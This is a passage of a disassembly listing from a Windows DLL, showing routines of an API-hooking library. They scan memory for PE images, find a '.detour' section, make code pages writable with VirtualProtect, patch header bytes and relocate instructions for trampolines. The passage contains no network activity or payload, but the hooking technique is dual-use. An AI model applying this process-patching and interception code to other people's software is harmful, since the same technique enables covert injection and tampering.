jmp short loc_10017EE4
; ---------------------------------------------------------------------------
loc_10017F5B: ; CODE XREF: sub_10017DDC+106�j
; sub_10017DDC+172�j
mov dword ptr [eax], 52727464h
mov eax, dword_10073FA4
xor ecx, ecx
mov [eax+8], ecx
mov eax, dword_10073FA4
mov edx, lpAddress
mov [eax+4], edx
mov eax, dword_10073FA4
mov lpAddress, eax
add eax, 0FFE0h
mov edx, 7FDh
loc_10017F8D: ; CODE XREF: sub_10017DDC+1BA�j
mov [eax+18h], ecx
mov ecx, eax
sub eax, 20h
dec edx
jnz short loc_10017F8D
mov eax, dword_10073FA4
mov [eax+8], ecx
mov eax, dword_10073FA4
loc_10017FA5: ; CODE XREF: sub_10017DDC+6A�j
; sub_10017DDC+8E�j
mov esi, [eax+8]
cmp esi, [ebp+arg_0]
jb short loc_10017FCC
cmp esi, [ebp+var_4]
ja short loc_10017FCC
mov ecx, [esi+18h]
push 20h ; Size
push 0CCh ; Val
push esi ; Dst
mov [eax+8], ecx
call memset ; memset
add esp, 0Ch
mov eax, esi
jmp short loc_10017FCE
; ---------------------------------------------------------------------------
loc_10017FCC: ; CODE XREF: sub_10017DDC+10B�j
; sub_10017DDC+135�j ...
xor eax, eax
loc_10017FCE: ; CODE XREF: sub_10017DDC+1EE�j
pop edi
pop esi
pop ebx
leave
retn
sub_10017DDC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_10017FD3(LPCVOID lpAddress)
sub_10017FD3 proc near ; CODE XREF: sub_10017B39+1A9�p
var_3C = dword ptr -3Ch
Buffer = _MEMORY_BASIC_INFORMATION ptr -38h
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
lpAddress = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_1001E5D8
push offset loc_10017470
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 2Ch
push ebx
push esi
push edi
mov [ebp+var_18], esp
push 1Ch ; dwLength
lea eax, [ebp+Buffer]
push eax ; lpBuffer
push [ebp+lpAddress] ; lpAddress
call ds:VirtualQuery ; VirtualQuery
test eax, eax
jz short loc_10018048
and [ebp+var_4], 0
mov ecx, [ebp+Buffer.AllocationBase]
cmp word ptr [ecx], 5A4Dh
jnz short loc_10018044
mov eax, [ecx+3Ch]
add eax, ecx
mov [ebp+var_3C], eax
cmp dword ptr [eax], 4550h
jnz short loc_10018044
cmp word ptr [eax+14h], 0
jnz short loc_10018039
xor eax, eax
loc_10018033: ; CODE XREF: sub_10017FD3+68�j
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_1001804A
; ---------------------------------------------------------------------------
loc_10018039: ; CODE XREF: sub_10017FD3+5C�j
mov eax, ecx
jmp short loc_10018033
; ---------------------------------------------------------------------------
loc_1001803D: ; DATA XREF: .rdata:1001E5DC�o
push 1
pop eax
retn
; ---------------------------------------------------------------------------
loc_10018041: ; DATA XREF: .rdata:1001E5E0�o
mov esp, [ebp+var_18]
loc_10018044: ; CODE XREF: sub_10017FD3+45�j
; sub_10017FD3+55�j
or [ebp+var_4], 0FFFFFFFFh
loc_10018048: ; CODE XREF: sub_10017FD3+37�j
xor eax, eax
loc_1001804A: ; CODE XREF: sub_10017FD3+64�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_10017FD3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall sub_10018059(int, LPCVOID lpAddress)
sub_10018059 proc near ; CODE XREF: sub_1000FBAA+C�p
flOldProtect = dword ptr -4
arg_0 = dword ptr 8
lpAddress = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
call ds:GetCurrentThreadId ; GetCurrentThreadId
cmp Destination, eax
jz short loc_10018078
mov eax, 10DDh
jmp loc_1001814E
; ---------------------------------------------------------------------------
loc_10018078: ; CODE XREF: sub_10018059+13�j
mov eax, dword_10073FB0
test eax, eax
jnz loc_1001814E
mov edi, [ebp+arg_0]
test edi, edi
jnz short loc_10018094
push 6
pop eax
jmp loc_1001814E
; ---------------------------------------------------------------------------
loc_10018094: ; CODE XREF: sub_10018059+31�j
cmp dword ptr [edi], 0
jnz short loc_100180A6
push 6
pop eax
mov dword_10073FB0, eax
jmp loc_10018148
; ---------------------------------------------------------------------------
loc_100180A6: ; CODE XREF: sub_10018059+3E�j
push 18h ; unsigned int
call ??2@YAPAXI@Z ; operator new(uint)
mov esi, eax
pop ecx
test esi, esi
jnz short loc_100180B9
push 8
pop edi
jmp short loc_10018132
; ---------------------------------------------------------------------------
loc_100180B9: ; CODE XREF: sub_10018059+59�j
mov edi, [edi]
push 0 ; int
push [ebp+lpAddress] ; lpAddress
call sub_100175EE
movzx ecx, byte ptr [edi+17h]
mov ebx, [edi+18h]
xor edx, edx
sub ebx, ecx
cmp ecx, edx
jz short loc_10018127
cmp ecx, 17h
ja short loc_10018127
cmp [edi+1Ch], eax
jnz short loc_10018127
lea eax, [ebp+flOldProtect]
mov [ebp+flOldProtect], edx
push eax ; lpflOldProtect
push 40h ; flNewProtect
push ecx ; dwSize
push ebx ; lpAddress
call ds:VirtualProtect ; VirtualProtect
test eax, eax
jnz short loc_100180FD
call ds:GetLastError
mov edi, eax
jmp short loc_10018132
; ---------------------------------------------------------------------------
loc_100180FD: ; CODE XREF: sub_10018059+98�j
mov eax, [ebp+arg_0]
mov dword ptr [esi+4], 1
mov [esi+8], eax
mov [esi+10h], edi
mov [esi+0Ch], ebx
mov eax, [ebp+flOldProtect]
mov [esi+14h], eax
mov eax, dword_10073FBC
mov [esi], eax
mov dword_10073FBC, esi
xor eax, eax
jmp short loc_1001814E
; ---------------------------------------------------------------------------
loc_10018127: ; CODE XREF: sub_10018059+79�j
; sub_10018059+7E�j ...
cmp dword_10073FA8, edx
push 9
pop edi
jnz short loc_10018138
loc_10018132: ; CODE XREF: sub_10018059+5E�j
; sub_10018059+A2�j
mov dword_10073FB0, edi
loc_10018138: ; CODE XREF: sub_10018059+D7�j
test esi, esi
jz short loc_10018143
push esi ; void *
call ??3@YAXPAX@Z ; operator delete(void *)
pop ecx
loc_10018143: ; CODE XREF: sub_10018059+E1�j
mov eax, edi
mov edi, [ebp+arg_0]
loc_10018148: ; CODE XREF: sub_10018059+48�j
mov dword_10073FB4, edi
loc_1001814E: ; CODE XREF: sub_10018059+1A�j
; sub_10018059+26�j ...
pop edi
pop esi
pop ebx
leave
retn 8
sub_10018059 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10018155 proc near ; CODE XREF: sub_1001854D:loc_10018554�p
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
Dst = dword ptr -38h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_23 = byte ptr -23h
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_1001E5F8
push offset loc_10017470
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 30h
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov eax, [ebp+arg_0]
test eax, eax
mov esi, 10000h
jz short loc_1001818D
lea esi, [eax+10000h]
loc_1001818D: ; CODE XREF: sub_10018155+30�j
push 1Ch ; Size
push 0 ; Val
lea eax, [ebp+Dst]
push eax ; Dst
call memset ; memset
add esp, 0Ch
loc_1001819D: ; CODE XREF: sub_10018155+93�j
push 1Ch ; dwLength
lea eax, [ebp+Dst]
push eax ; lpBuffer
push esi ; lpAddress
call ds:VirtualQuery ; VirtualQuery
test eax, eax
jbe short loc_1001820C
cmp [ebp+var_28], 1000h
jnz short loc_100181DF
test [ebp+var_23], 1
jnz short loc_100181DF
and [ebp+var_4], 0
mov [ebp+var_3C], esi
cmp word ptr [esi], 5A4Dh
jnz short loc_100181DB
mov eax, [esi+3Ch]
add eax, esi
mov [ebp+var_40], eax
cmp dword ptr [eax], 4550h
jz short loc_100181EA
loc_100181DB: ; CODE XREF: sub_10018155+74�j
or [ebp+var_4], 0FFFFFFFFh
loc_100181DF: ; CODE XREF: sub_10018155+60�j
; sub_10018155+66�j
mov eax, [ebp+var_2C]
mov ecx, [ebp+Dst]
lea esi, [eax+ecx]
jmp short loc_1001819D
; ---------------------------------------------------------------------------
loc_100181EA: ; CODE XREF: sub_10018155+84�j
or [ebp+var_4], 0FFFFFFFFh
mov eax, esi
loc_100181F0: ; CODE XREF: sub_10018155+B9�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 4
; ---------------------------------------------------------------------------
loc_10018201: ; DATA XREF: .rdata:1001E5FC�o
push 1
pop eax
retn
; ---------------------------------------------------------------------------
loc_10018205: ; DATA XREF: .rdata:1001E600�o
mov esp, [ebp+var_18]
or [ebp+var_4], 0FFFFFFFFh
loc_1001820C: ; CODE XREF: sub_10018155+57�j
xor eax, eax
jmp short loc_100181F0
sub_10018155 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10018210 proc near ; CODE XREF: sub_1001832C+34�p
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_1001E608
push offset loc_10017470
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 20h
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov eax, [ebp+arg_0]
mov [ebp+var_1C], eax
xor ebx, ebx
cmp eax, ebx
jnz short loc_1001824C
push ebx ; lpModuleName
call ds:GetModuleHandleA ; GetModuleHandleA
mov [ebp+var_1C], eax
loc_1001824C: ; CODE XREF: sub_10018210+30�j
mov [ebp+var_4], ebx
cmp word ptr [eax], 5A4Dh
jz short loc_10018260
push 0C1h
jmp loc_1001830F
; ---------------------------------------------------------------------------
loc_10018260: ; CODE XREF: sub_10018210+44�j
mov esi, [eax+3Ch]
add esi, eax
mov [ebp+var_24], esi
cmp dword ptr [esi], 4550h
jz short loc_1001827A
push 0BFh
jmp loc_1001830F
; ---------------------------------------------------------------------------
loc_1001827A: ; CODE XREF: sub_10018210+5E�j
mov ax, [esi+14h]
cmp ax, bx
jnz short loc_1001829B
loc_10018283: ; CODE XREF: sub_10018210+9E�j
; sub_10018210+BF�j ...
xor esi, esi
push 0C0h ; dwErrCode
loc_1001828A: ; CODE XREF: sub_10018210+EE�j
call ds:SetLastError
or [ebp+var_4], 0FFFFFFFFh
mov eax, esi
jmp loc_1001831B
; ---------------------------------------------------------------------------
loc_1001829B: ; CODE XREF: sub_10018210+71�j
movzx eax, ax
lea eax, [eax+esi+18h]
mov [ebp+var_20], eax
loc_100182A5: ; CODE XREF: sub_10018210+F1�j
mov [ebp+var_28], ebx
movzx eax, word ptr [esi+6]
cmp ebx, eax
jnb short loc_10018283
lea eax, [ebx+ebx*4]
mov ecx, [ebp+var_20]
lea edi, [ecx+eax*8]
push offset a_detour ; ".detour"
push edi ; Str1
call strcmp ; strcmp
pop ecx
pop ecx
test eax, eax
jnz short loc_10018300
mov eax, [edi+0Ch]
test eax, eax
jz short loc_10018283
cmp dword ptr [edi+10h], 0
jz short loc_10018283
mov ecx, [ebp+var_1C]
lea esi, [eax+ecx]
mov [ebp+var_2C], esi
mov [ebp+var_30], esi
mov eax, [esi]
cmp eax, 40h
jb short loc_10018283
cmp dword ptr [esi+4], 727444h
jnz short loc_10018283
cmp dword ptr [esi+8], 0
jnz short loc_100182FC
mov [esi+8], eax
loc_100182FC: ; CODE XREF: sub_10018210+E7�j
push 0
jmp short loc_1001828A
; ---------------------------------------------------------------------------
loc_10018300: ; CODE XREF: sub_10018210+B8�j
inc ebx
jmp short loc_100182A5
; ---------------------------------------------------------------------------
loc_10018303: ; DATA XREF: .rdata:1001E60C�o
push 1
pop eax
retn
; ---------------------------------------------------------------------------
loc_10018307: ; DATA XREF: .rdata:1001E610�o
mov esp, [ebp+var_18]
push 0C0h ; dwErrCode
loc_1001830F: ; CODE XREF: sub_10018210+4B�j
; sub_10018210+65�j
call ds:SetLastError
or [ebp+var_4], 0FFFFFFFFh
xor eax, eax
loc_1001831B: ; CODE XREF: sub_10018210+86�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 4
sub_10018210 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1001832C proc near ; CODE XREF: sub_1001854D+1C�p
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_1001E618
push offset loc_10017470
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 20h
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov edi, [ebp+arg_8]
xor ebx, ebx
cmp edi, ebx
jz short loc_1001835D
mov [edi], ebx
loc_1001835D: ; CODE XREF: sub_1001832C+2D�j
push [ebp+arg_0]
call sub_10018210
cmp eax, ebx
jz loc_10018449
mov [ebp+var_4], ebx
mov [ebp+var_24], eax
cmp dword ptr [eax], 40h
jb loc_10018423
cmp dword ptr [eax+4], 727444h
jnz loc_10018423
mov esi, [eax+8]
add esi, eax
mov [ebp+var_28], esi
mov ecx, [eax+0Ch]
add ecx, eax
mov [ebp+var_2C], ecx
mov [ebp+var_20], esi
mov eax, [ebp+arg_4]
loc_1001839F: ; CODE XREF: sub_1001832C+F1�j
cmp esi, ecx
jnb short loc_1001841F
mov [ebp+var_30], esi
mov edx, [esi+8]
cmp edx, [eax]
jnz short loc_10018418
mov dx, [esi+0Ch]
cmp dx, [eax+4]
jnz short loc_10018418
mov dx, [esi+0Eh]
cmp dx, [eax+6]
jnz short loc_10018418
mov dl, [esi+10h]
cmp dl, [eax+8]
jnz short loc_10018418
mov dl, [esi+11h]
cmp dl, [eax+9]
jnz short loc_10018418
mov dl, [esi+12h]
cmp dl, [eax+0Ah]
jnz short loc_10018418
mov dl, [esi+13h]
cmp dl, [eax+0Bh]
jnz short loc_10018418
mov dl, [esi+14h]
cmp dl, [eax+0Ch]
jnz short loc_10018418
mov dl, [esi+15h]
cmp dl, [eax+0Dh]
jnz short loc_10018418
mov dl, [esi+16h]
cmp dl, [eax+0Eh]
jnz short loc_10018418
mov dl, [esi+17h]
cmp dl, [eax+0Fh]
jnz short loc_10018418
cmp edi, ebx
jz short loc_10018418
mov eax, [esi]
sub eax, 18h
mov [edi], eax
push ebx ; dwErrCode
call ds:SetLastError
lea eax, [esi+18h]
jmp short loc_10018430
; ---------------------------------------------------------------------------
loc_10018418: ; CODE XREF: sub_1001832C+7F�j
; sub_1001832C+89�j ...
add esi, [esi]
mov [ebp+var_20], esi
jmp short loc_1001839F
; ---------------------------------------------------------------------------
loc_1001841F: ; CODE XREF: sub_1001832C+75�j
push 6
jmp short loc_10018428
; ---------------------------------------------------------------------------
loc_10018423: ; CODE XREF: sub_1001832C+4A�j
; sub_1001832C+57�j
push 0BFh ; dwErrCode
loc_10018428: ; CODE XREF: sub_1001832C+F5�j
call ds:SetLastError
xor eax, eax
loc_10018430: ; CODE XREF: sub_1001832C+EA�j
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_1001844B
; ---------------------------------------------------------------------------
loc_10018436: ; DATA XREF: .rdata:1001E61C�o
push 1
pop eax
retn
; ---------------------------------------------------------------------------
loc_1001843A: ; DATA XREF: .rdata:1001E620�o
mov esp, [ebp+var_18]
push 6 ; dwErrCode
call ds:SetLastError
or [ebp+var_4], 0FFFFFFFFh
loc_10018449: ; CODE XREF: sub_1001832C+3B�j
xor eax, eax
loc_1001844B: ; CODE XREF: sub_1001832C+108�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 0Ch
sub_1001832C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall sub_1001845C(DWORD flOldProtect, DWORD flNewProtect)
sub_1001845C proc near ; CODE XREF: sub_1001854D+32�p
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
flOldProtect = dword ptr 8
flNewProtect = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
mov esi, [ebp+flOldProtect]
mov eax, 150h
cmp [esi], eax
jnz loc_1001853B
cmp [ebp+flNewProtect], eax
jb loc_1001853B
and [ebp+var_4], 0
lea eax, [ebp+flNewProtect]
push edi
mov edi, ds:VirtualProtect
push eax ; lpflOldProtect
push 40h ; flNewProtect
push 40h ; dwSize
push dword ptr [esi+4] ; lpAddress
call edi ; VirtualProtect
test eax, eax
jz loc_10018535
lea eax, [ebp+var_8]
push ebx
push eax ; lpflOldProtect
mov ebx, 0F8h
push 40h ; flNewProtect
push ebx ; dwSize
push dword ptr [esi+8] ; lpAddress
call edi ; VirtualProtect
test eax, eax
jz short loc_10018526
mov eax, [esi+0Ch]
test eax, eax
jz short loc_100184C8
lea ecx, [ebp+var_C]
push ecx ; lpflOldProtect
push 40h ; flNewProtect
push 4 ; dwSize
push eax ; lpAddress
call edi ; VirtualProtect
test eax, eax
jz short loc_10018519
loc_100184C8: ; CODE XREF: sub_1001845C+5B�j
lea eax, [esi+14h]
push 40h ; Size
push eax ; Src
push dword ptr [esi+4] ; Dst
call memcpy ; memcpy
lea eax, [esi+54h]
push ebx ; Size
push eax ; Src
push dword ptr [esi+8] ; Dst
call memcpy ; memcpy
mov eax, [esi+0Ch]
add esp, 18h
test eax, eax
jz short loc_100184FF
lea ecx, [esi+14Ch]
push 4 ; Size
push ecx ; Src
push eax ; Dst
call memcpy ; memcpy
add esp, 0Ch
loc_100184FF: ; CODE XREF: sub_1001845C+8F�j
mov eax, [esi+0Ch]
mov [ebp+var_4], 1
test eax, eax
jz short loc_10018519
lea ecx, [ebp+flOldProtect]
push ecx ; lpflOldProtect
push [ebp+flNewProtect] ; flNewProtect
push 4 ; dwSize
push eax ; lpAddress
call edi ; VirtualProtect
loc_10018519: ; CODE XREF: sub_1001845C+6A�j
; sub_1001845C+AF�j
lea eax, [ebp+flOldProtect]
push eax ; lpflOldProtect
push [ebp+var_8] ; flNewProtect
push ebx ; dwSize
push dword ptr [esi+8] ; lpAddress
call edi ; VirtualProtect
loc_10018526: ; CODE XREF: sub_1001845C+54�j
lea eax, [ebp+flOldProtect]
push eax ; lpflOldProtect
push [ebp+flNewProtect] ; flNewProtect
push 40h ; dwSize
push dword ptr [esi+4] ; lpAddress
call edi ; VirtualProtect
pop ebx
loc_10018535: ; CODE XREF: sub_1001845C+3A�j
mov eax, [ebp+var_4]
pop edi
jmp short loc_10018548
; ---------------------------------------------------------------------------
loc_1001853B: ; CODE XREF: sub_1001845C+11�j
; sub_1001845C+1A�j
push 0C1h ; dwErrCode
call ds:SetLastError
xor eax, eax
loc_10018548: ; CODE XREF: sub_1001845C+DD�j
pop esi
leave
retn 8
sub_1001845C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1001854D proc near ; CODE XREF: DllMain(x,x,x)+20F�p
flNewProtect = dword ptr -4
push ebp
mov ebp, esp
push ecx
push esi
push 0
loc_10018554: ; CODE XREF: sub_1001854D+2C�j
call sub_10018155
mov esi, eax
test esi, esi
jz short loc_10018586
lea eax, [ebp+flNewProtect]
push eax
push offset dword_1001E5E8
push esi
call sub_1001832C
test eax, eax
jz short loc_10018578
cmp [ebp+flNewProtect], 0
jnz short loc_1001857B
loc_10018578: ; CODE XREF: sub_1001854D+23�j
push esi
jmp short loc_10018554
; ---------------------------------------------------------------------------
loc_1001857B: ; CODE XREF: sub_1001854D+29�j
push [ebp+flNewProtect] ; flNewProtect
push eax ; flOldProtect
call sub_1001845C
jmp short loc_10018590
; ---------------------------------------------------------------------------
loc_10018586: ; CODE XREF: sub_1001854D+10�j
push 7Eh ; dwErrCode
call ds:SetLastError
xor eax, eax
loc_10018590: ; CODE XREF: sub_1001854D+37�j
pop esi
leave
retn
sub_1001854D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10018593 proc near ; CODE XREF: sub_1001785F+74�p
; sub_10017B39+FD�p
var_5C = byte ptr -5Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 5Ch
push [ebp+arg_C]
lea ecx, [ebp+var_5C]
push [ebp+arg_8]
call sub_100185B9
push [ebp+arg_4]
lea ecx, [ebp+var_5C]
push [ebp+arg_0]
call sub_100185ED
leave
retn 10h
sub_10018593 endp
; =============== S U B R O U T I N E =======================================
sub_100185B9 proc near ; CODE XREF: sub_10018593+F�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, ecx
push esi
mov ecx, [esp+4+arg_0]
xor esi, esi
cmp ecx, esi
mov [eax], esi
mov [eax+4], esi
mov [eax+8], esi
jnz short loc_100185D1
lea ecx, [eax+18h]
loc_100185D1: ; CODE XREF: sub_100185B9+13�j
mov edx, [esp+4+arg_4]
mov [eax+0Ch], ecx
cmp edx, esi
jnz short loc_100185DF
lea edx, [eax+14h]
loc_100185DF: ; CODE XREF: sub_100185B9+21�j
mov [eax+10h], edx
mov [ecx], esi
mov ecx, [eax+10h]
mov [ecx], esi
pop esi
retn 8
sub_100185B9 endp
; =============== S U B R O U T I N E =======================================
sub_100185ED proc near ; CODE XREF: sub_10018593+1D�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jnz short loc_100185F9
lea esi, [ecx+1Ch]
loc_100185F9: ; CODE XREF: sub_100185ED+7�j
mov edx, [esp+4+arg_4]
test edx, edx
jnz short loc_1001860D
push 0Dh ; dwErrCode
call ds:SetLastError
xor eax, eax
jmp short loc_1001861D
; ---------------------------------------------------------------------------
loc_1001860D: ; CODE XREF: sub_100185ED+12�j
movzx eax, byte ptr [edx]
push edx
push esi
lea eax, dword_1001E728[eax*8]
push eax
call dword ptr [eax+4]
loc_1001861D: ; CODE XREF: sub_100185ED+1E�j
pop esi
retn 8
sub_100185ED endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall sub_10018621(int, void *Dst, void *Src)
sub_10018621 proc near ; CODE XREF: sub_10018714+13�p
; sub_100187F7+13�p ...
var_C = dword ptr -0Ch
Size = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
Dst = dword ptr 0Ch
Src = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, [ebp+arg_0]
push esi
mov [ebp+var_C], ecx
mov eax, [eax]
test eax, 20000000h
jz short loc_1001863D
cmp dword ptr [ecx+4], 0
jmp short loc_10018640
; ---------------------------------------------------------------------------
loc_1001863D: ; CODE XREF: sub_10018621+14�j
cmp dword ptr [ecx], 0
loc_10018640: ; CODE XREF: sub_10018621+1A�j
mov esi, eax
jz short loc_10018649
shr esi, 0Ch
jmp short loc_1001864C
; ---------------------------------------------------------------------------
loc_10018649: ; CODE XREF: sub_10018621+21�j
shr esi, 8
loc_1001864C: ; CODE XREF: sub_10018621+26�j
push ebx
mov ebx, eax
and esi, 0Fh
push edi
shl ebx, 8
sar ebx, 1Ch
mov edi, esi
mov [ebp+Size], esi
sub edi, ebx
test eax, 0F0000h
jbe short loc_100186B5
mov ecx, [ebp+Src]
shr eax, 10h
and eax, 0Fh
add eax, ecx
mov cl, [eax]
mov [ebp+var_1], cl
movzx ecx, cl
mov cl, ds:byte_1001E628[ecx]
mov dl, cl
and edx, 0Fh
add edx, esi
test cl, 10h
mov [ebp+Size], edx
jz short loc_100186B5
mov al, [eax+1]
and al, 7
cmp al, 5
jnz short loc_100186B0
mov al, [ebp+var_1]
and al, 0C0h
jz short loc_100186AC
cmp al, 40h
jnz short loc_100186A8
inc [ebp+Size]
jmp short loc_100186B0
; ---------------------------------------------------------------------------
loc_100186A8: ; CODE XREF: sub_10018621+80�j
cmp al, 80h
jnz short loc_100186B0
loc_100186AC: ; CODE XREF: sub_10018621+7C�j
add [ebp+Size], 4
loc_100186B0: ; CODE XREF: sub_10018621+75�j
; sub_10018621+85�j ...
mov edi, [ebp+Size]
sub edi, ebx
loc_100186B5: ; CODE XREF: sub_10018621+44�j
; sub_10018621+6C�j
push [ebp+Size] ; Size
push [ebp+Src] ; Src
push [ebp+Dst] ; Dst
call memcpy ; memcpy
add esp, 0Ch
test ebx, ebx
jz short loc_100186E4
push edi
push ebx
push esi
mov esi, [ebp+var_C]
push [ebp+Src]
mov ecx, esi
push [ebp+Dst]
call sub_10018749
mov ecx, [esi+0Ch]
mov [ecx], eax
jmp short loc_100186E7
; ---------------------------------------------------------------------------
loc_100186E4: ; CODE XREF: sub_10018621+A7�j
mov esi, [ebp+var_C]
loc_100186E7: ; CODE XREF: sub_10018621+C1�j
mov ecx, [ebp+arg_0]
pop edi
pop ebx
test byte ptr [ecx+3], 40h
jz short loc_100186FB
mov eax, [esi+10h]
mov edx, [eax]
neg edx
mov [eax], edx
loc_100186FB: ; CODE XREF: sub_10018621+CF�j
test byte ptr [ecx+3], 10h
jz short loc_10018707
mov eax, [esi+0Ch]
or dword ptr [eax], 0FFFFFFFFh
loc_10018707: ; CODE XREF: sub_10018621+DE�j
mov eax, [ebp+Size]
mov ecx, [ebp+Src]
add eax, ecx
pop esi
leave
retn 0Ch
sub_10018621 endp
; =============== S U B R O U T I N E =======================================
; int __stdcall sub_10018714(int, void *Dst, void *Src)
sub_10018714 proc near ; CODE XREF: sub_1001882C+12�p
; sub_10018846+13�p
; DATA XREF: ...
arg_0 = dword ptr 4
Dst = dword ptr 8
Src = dword ptr 0Ch
push ebx
push esi
mov esi, [esp+8+Src]
push edi
mov edi, [esp+0Ch+Dst]
push esi ; Src
push edi ; Dst
mov ebx, ecx
push [esp+14h+arg_0] ; int
call sub_10018621
movzx ecx, byte ptr [esi+1]
lea eax, [esi+1]
inc edi
lea edx, dword_1001E728[ecx*8]
push eax
push edi
push edx
mov ecx, ebx
call dword ptr [edx+4]
pop edi
pop esi
pop ebx
retn 0Ch
sub_10018714 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10018749 proc near ; CODE XREF: sub_10018621+B7�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
mov eax, [ebp+arg_C]
push ebx
mov ebx, [ebp+arg_0]
push esi
xor edx, edx
push edi
lea esi, [ebx+eax]
mov eax, [ebp+arg_10]
dec eax
jz short loc_10018775
dec eax
jz short loc_10018770
dec eax
dec eax
jz short loc_1001876C
sub eax, 4
jnz short loc_10018778
loc_1001876C: ; CODE XREF: sub_10018749+1C�j
mov edx, [esi]
jmp short loc_10018778
; ---------------------------------------------------------------------------
loc_10018770: ; CODE XREF: sub_10018749+18�j
movsx edx, word ptr [esi]
jmp short loc_10018778
; ---------------------------------------------------------------------------
loc_10018775: ; CODE XREF: sub_10018749+15�j
movsx edx, byte ptr [esi]
loc_10018778: ; CODE XREF: sub_10018749+21�j
; sub_10018749+25�j ...
mov edi, [ebp+arg_4]
lea eax, [edx+edi]
sub edx, ebx
add eax, [ebp+arg_8]
add edx, edi
mov edi, [ebp+arg_10]
dec edi
jz short loc_100187D3
dec edi
jz short loc_100187B5
dec edi
dec edi
jz short loc_1001879B
sub edi, 4
jnz short loc_100187E8
mov [esi], edx
jmp short loc_100187E8
; ---------------------------------------------------------------------------
loc_1001879B: ; CODE XREF: sub_10018749+47�j
cmp edx, 80000000h
mov [esi], edx
jl short loc_100187AD
cmp edx, 7FFFFFFFh
jle short loc_100187E8
loc_100187AD: ; CODE XREF: sub_10018749+5A�j
mov ecx, [ecx+10h]
and dword ptr [ecx], 0
jmp short loc_100187E8
; ---------------------------------------------------------------------------
loc_100187B5: ; CODE XREF: sub_10018749+43�j
cmp edx, 0FFFF8000h
mov [esi], dx
jl short loc_100187C8
cmp edx, 7FFFh
jle short loc_100187E8
loc_100187C8: ; CODE XREF: sub_10018749+75�j
mov ecx, [ecx+10h]
mov dword ptr [ecx], 2
jmp short loc_100187E8
; ---------------------------------------------------------------------------
loc_100187D3: ; CODE XREF: sub_10018749+40�j
cmp edx, 0FFFFFF80h
mov [esi], dl
jl short loc_100187DF
cmp edx, 7Fh
jle short loc_100187E8
loc_100187DF: ; CODE XREF: sub_10018749+8F�j
mov ecx, [ecx+10h]
mov dword ptr [ecx], 3
loc_100187E8: ; CODE XREF: sub_10018749+4C�j
; sub_10018749+50�j ...
pop edi
pop esi
pop ebx
pop ebp
retn 14h
sub_10018749 endp
; =============== S U B R O U T I N E =======================================
sub_100187EF proc near ; DATA XREF: .rdata:1001EDDC�o
; .rdata:1001EEB4�o ...
arg_8 = dword ptr 0Ch
mov eax, [esp+arg_8]
inc eax
retn 0Ch
sub_100187EF endp
; =============== S U B R O U T I N E =======================================
; int __stdcall sub_100187F7(int, void *Dst, void *Src)
sub_100187F7 proc near ; DATA XREF: .rdata:1001E7A4�o
arg_0 = dword ptr 4
Dst = dword ptr 8
Src = dword ptr 0Ch
push ebx
push esi
mov esi, [esp+8+Src]
push edi
mov edi, [esp+0Ch+Dst]
push esi ; Src
push edi ; Dst
mov ebx, ecx
push [esp+14h+arg_0] ; int
